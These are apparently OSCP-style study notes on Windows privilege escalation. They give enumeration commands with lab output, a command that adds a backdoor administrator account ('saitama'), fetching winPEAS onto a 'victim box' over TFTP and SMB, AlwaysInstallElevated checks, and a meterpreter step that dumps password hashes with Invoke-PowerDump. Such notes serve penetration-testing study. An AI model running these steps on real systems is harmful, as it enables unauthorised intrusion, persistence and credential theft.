Windows privilege escalation
Table of Contents
In the windows environment, to escalate privilege various information about the target system is needed. Unfortunately Windows systems are not as easy as Linux specially in the case of terminal and obtaining information from the shell. Everything in Windows systems seems twisted and made intentionally complex. You will have to remember a lot of tools other commands just to grab the basic informations about the system.
Below I have listed down some of the commands which should help.
INFORMATION COLLECTION#
running user#
What is my account name
C:\Users>whoami
svcorp\alice
In which groups am I in ?
C:\Users\Public>whoami /groups
whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Group used for deny only
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
system information#
C:\Users>systeminfo
Host Name: SVCLIENT08
OS Name: Microsoft Windows 10 Pro N
OS Version: 10.0.14393 N/A Build 14393
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00331-60000-00000-AA584
Original Install Date: 04/03/2019, 13:27:02
System Boot Time: 25/11/2020, 14:29:01
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
<SNIP>
opeating system edition#
type C:\Windows\system32\eula.txt
NET COMMAND#
create user#
To add a user into the system
net user saitama P@ssw0rd196 /ADD
net localgroup administrators saitama /add
to view all the users#
net users
view domain groups#
C:\Windows>net group /domain
The request will be processed at a domain controller for domain svcorp.com.
Group Accounts for \\sv-dc01.svcorp.com
-------------------------------------------------------------------------------
*Cloneable Domain Controllers
*Company_Mail
...
view services#
It is also possible to view all the running services using net command, the details of this has been shown in services section.
net start
TRANSFER FILE#
tftp#
Start TFTP service in the kali machine by running the command
$ sudo service atftpd start
When the service is up and running, you can now pull / get the file from TFTP server by using following command.
C:\>tftp -i 192.168.119.178 GET winPEASx86.exe winPEASx86.exe
Here, please note that the files are located in the /srv/tftpd location.
smb#
It is possible to mount the smb shares in the kali machine and mount that share into the victim box.
net use m: \\192.168.119.178\folder1 /user:kali kali
When work is done use the following command to remove it.
net use m: /delete
ALWAYS INSTLL ELIVATED#
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
SERVICE#
Enum information of all the services#
By using this you can view detailed information of all the services running on the remote system. The command works at XP SP1.
C:\>sc queryex type= service
sc queryex type= service
SERVICE_NAME: ALG
DISPLAY_NAME: Application Layer Gateway Service
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
PID : 964
FLAGS :
<SNIP>
All the running services can also be obtained by using tasklist.
C:\>tasklist /SVC
Image Name PID Services
========================= ====== =============================================
System Idle Process 0 N/A
System 4 N/A
smss.exe 360 N/A
csrss.exe 408 N/A
winlogon.exe 432 N/A
services.exe 476 Eventlog, PlugPlay
lsass.exe 488 SamSs
svchost.exe 664 RpcSs
svchost.exe 712 AudioSrv, Browser, CryptSvc, dmserver,
EventSystem, lanmanserver,
lanmanworkstation, Messenger, Netman, Nla,
RasMan, Schedule, seclogon, SENS,
SharedAccess, ShellHWDetection, TapiSrv,
TermService, Themes, TrkWks, uploadmgr,
winmgmt
svchost.exe 760 Dnscache
svchost.exe 772 LmHosts, RemoteRegistry, WebClient
alg.exe 964 ALG
snmp.exe 1028 SNMP
VGAuthService.exe 1052 VGAuthService
To view the running processes in the system.
C:\>tasklist
tasklist
Image Name PID Session Name Session# Mem Usage
========================= ====== ================ ======== ============
System Idle Process 0 0 20 K
System 4 0 216 K
smss.exe 360 0 344 K
csrss.exe 408 0 1,864 K
winlogon.exe 432 0 40,668 K
services.exe 476 0 10,024 K
lsass.exe 488 0 4,520 K
svchost.exe 664 0 3,064 K
svchost.exe 712 0 22,688 K
C:\> net start
These Windows services are started:
Application Layer Gateway Service
COM+ Event System
COM+ System Application
Computer Browser
Cryptographic Services
Distributed Link Tracking Client
Distributed Transaction Coordinator
DNS Client
Event Log
FTP Publishing
IIS Admin
Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS)
Logical Disk Manager
Messenger
Network Connections
Network Location Awareness (NLA)
Plug and Play
Remote Access Connection Manager
To query all the drives running in the system.
C:\>DRIVERQUERY
Module Name Display Name Driver Type Link Date
============ ====================== ============= ======================
ACPI Microsoft ACPI Driver Kernel 8/29/2002 9:09:03 AM
ACPIEC ACPIEC Kernel 8/17/2001 9:57:55 PM
AFD AFD Networking Support Kernel 8/17/2011 2:49:53 PM
agp440 Intel AGP Bus Filter Kernel 8/17/2001 9:57:59 PM
AsyncMac RAS Asynchronous Media Kernel 8/17/2001 9:55:29 PM
atapi Standard IDE/ESDI Hard Kernel 8/29/2002 9:27:48 AM
Atmarpc ATM ARP Client Protoco Kernel 8/17/2001 9:46:40 PM
audstub Audio Stub Driver Kernel 8/17/2001 9:59:40 PM
Beep Beep Kernel 8/17/2001 9:47:33 PM
cbidf2k cbidf2k Kernel 8/17/2001 9:52:06 PM
Cdaudio Cdaudio Kernel 8/17/2001 9:52:26 PM
Cdfs Cdfs File System 8/29/2002 9:58:50 AM
Cdrom CD-ROM Driver Kernel 8/29/2002 9:27:55 AM
CmBatt Microsoft AC Adapter D Kernel 8/29/2002 9:09:04 AM
Compbatt Microsoft Composite Ba Kernel 8/17/2001 9:57:58 PM
Disk Disk Driver Kernel 8/29/2002 9:27:56 AM
This command might not work if the user does not have sufficient permission to run wmic.
wmic product get name, version, vendor
using PowerShell#
Get-Service
service details#
To obtain detailed information of a specific service:
C:\>sc query uploadmgr
sc query uploadmgr
SERVICE_NAME: uploadmgr
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
Detailed information:
C:\>sc qc uploadmgr
sc qc uploadmgr
[SC] GetServiceConfig SUCCESS
SERVICE_NAME: uploadmgr
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\WINDOWS\System32\svchost.exe -k netsvcs
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Upload Manager
DEPENDENCIES : RPCSS
SERVICE_START_NAME : LocalSystem
Here, the binary path should show the exact location from where this application is running from, but in this case it is not.
script to check for permissions#
First you need to go to a location where you have write permission and run this command. It will list down all the commands
We are interested in services where permissions are: BUILTIN\Users with (F) or (C) or (M) for our group. More info about permissions:
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> permissions.txt
Then run the following command which will use icalcs to view the permissions in the services.
for /f eol^=^"^ delims^=^" %a in (permissions.txt) do cmd.exe /c icacls "%a"
PowerShell#
msf PowerDump.ps1#
Use following command to impor the PowerDump script and execute it.
meterpreter > powershell_import /home/kali/Desktop/wintools/Invoke-PowerDump.ps1
meterpreter > powershell_execute Invoke-PowerDump
SCHEDULED TASKS#
all service - verbose#
The following command dumps all the running services in the running system. Data found from this command can overwhelming.
schtasks /query /fo LIST /v
schtasks /query /fo LIST
DRIVERS#
Installed Drivers#
To do this first you need to go to powershell as it utilizes some of the select from it.
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path
View Driver Version#
Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DevicenName -like "*udfs*"}
PS - View Driver Version#
Get-WmiObject Win32_PnPSignedDriver| select DeviceName, DriverVersion, Manufacturer
AUTO ELEIVATE#
#
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
reference#
- Following exploits hands on (Services with Vulnerable Privileges etc.. need to study (link)
- some good list of how to escalate priv in windows (link)
- how grab file from attacker ws (link)
- accesschk.exe for windows xp (link)
- a very good list of what to do post (link)
- good guide (link)
- windows exploits and versions, mostly for HTB but should work too (link)
- already compiled exploits ready to download and run(link)
- looking for this one ? (link)
- priv esc using unquoted service (link)
unsorted references#
https://0x1.gitlab.io/exploit/Windows-Privilege-Escalation/ http://www.fuzzysecurity.com/tutorials/16.html https://sushant747.gitbooks.io/total-oscp-guide/content/cmd.html https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html https://blog.adithyanak.com/oscp-preparation-guide https://thor-sec.com/review/oscp/oscp_review/ https://github.com/dostoevskylabs/dostoevsky-pentest-notes/blob/master/chapter-4.md
http://0xc0ffee.io/blog/OSCP-Goldmine https://guif.re/windowseop